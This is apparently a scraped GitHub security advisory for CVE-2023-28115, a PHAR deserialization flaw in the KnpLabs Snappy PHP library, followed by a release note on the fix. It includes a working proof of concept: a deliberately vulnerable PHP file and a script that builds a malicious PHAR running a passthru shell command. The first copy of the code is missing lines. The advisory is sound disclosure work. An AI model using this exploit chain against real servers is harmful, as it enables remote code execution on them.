

GHSA-gq6w-q6wh-jggc: PHAR deserialization allowing remote code execution


snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the file_exists() function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the generateFromHtml() function, it will invoke deserialization.

Proof of Concept

Install Snappy via composer require knplabs/knp-snappy. After that, under snappy directory, create an index.php file with this vulnerable code.

// index.php

// include autoloader
require __DIR__ . '/vendor/autoload.php';

// reference the snappy namespace
use Knp\Snappy\Pdf;

// vulnerable object
class VulnerableClass {
    public $fileName;
    public $callback;

    function __destruct() {
        call_user_func($this->callback, $this->fileName);

$snappy = new Pdf('/usr/local/bin/wkhtmltopdf');
// generate pdf from html content and save it at phar://poc.phar
$snappy->generateFromHtml('<h1>Bill</h1><p>You owe me money, dude.</p>', 'phar://poc.phar');

As an attacker, we going to generate the malicious phar using this script.

// generate_phar.php

class VulnerableClass { }
// Create a new instance of the Dummy class and modify its property
$dummy = new VulnerableClass();
$dummy->callback = "passthru";
$dummy->fileName = "uname -a > pwned"; //our payload

// Delete any existing PHAR archive with that name

// Create a new archive
$poc = new Phar("poc.phar");

// Add all write operations to a buffer, without modifying the archive on disk

// Set the stub
$poc->setStub("<?php echo 'Here is the STUB!'; __HALT_COMPILER();");

// Add a new file in the archive with "text" as its content
$poc["file"] = "text";

// Add the dummy object to the metadata. This will be serialized

// Stop buffering and write changes to disk

Then run these command to generate the file

php --define phar.readonly=0 generate_phar.php

Then execute index.php with php index.php. You will see a file named pwned will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick.


This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains.



  1. GitHub Advisory Database
  2. GitHub Reviewed
  3. CVE-2023-28115

PHAR deserialization allowing remote code execution

Critical severity GitHub Reviewed Published Mar 17, 2023 in KnpLabs/snappy • Updated Mar 17, 2023


composer knplabs/knp-snappy (Composer)

Affected versions

<= 1.4.1


snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the file_exists() function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If user can control the output file from the generateFromHtml() function, it will invoke deserialization.

Proof of Concept

Install Snappy via composer require knplabs/knp-snappy. After that, under snappy directory, create an index.php file with this vulnerable code.

<?php // index.php

// include autoloader require __DIR__ . '/vendor/autoload.php’;

// reference the snappy namespace use Knp\Snappy\Pdf;

// vulnerable object class VulnerableClass { public $fileName; public $callback;

function \_\_destruct() {
    call\_user\_func($this\->callback, $this\->fileName);


$snappy = new Pdf(‘/usr/local/bin/wkhtmltopdf’); // generate pdf from html content and save it at phar://poc.phar $snappy->generateFromHtml('<h1>Bill</h1><p>You owe me money, dude.</p>’, ‘phar://poc.phar’);

As an attacker, we going to generate the malicious phar using this script.

<?php // generate_phar.php

class VulnerableClass { } // Create a new instance of the Dummy class and modify its property $dummy = new VulnerableClass(); $dummy->callback = "passthru"; $dummy->fileName = "uname -a > pwned"; //our payload

// Delete any existing PHAR archive with that name @unlink(“poc.phar”);

// Create a new archive $poc = new Phar(“poc.phar”);

// Add all write operations to a buffer, without modifying the archive on disk $poc->startBuffering();

// Set the stub $poc->setStub(“<?php echo 'Here is the STUB!’; __HALT_COMPILER();”);

// Add a new file in the archive with “text” as its content $poc[“file”] = "text";

// Add the dummy object to the metadata. This will be serialized $poc->setMetadata($dummy);

// Stop buffering and write changes to disk $poc->stopBuffering(); ?>

Then run these command to generate the file

php --define phar.readonly=0 generate_phar.php

Then execute index.php with php index.php. You will see a file named pwned will be created. Noted that attacker can upload a file with any extension such as .png or .jpeg. So poc.jpeg also will do the trick.


This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains.





  • GHSA-gq6w-q6wh-jggc
  • KnpLabs/snappy@1ee6360

Published to the GitHub Advisory Database

Mar 17, 2023

Last updated

Mar 17, 2023

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CVE-2023-28115: Release v1.4.2 · KnpLabs/snappy

Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2.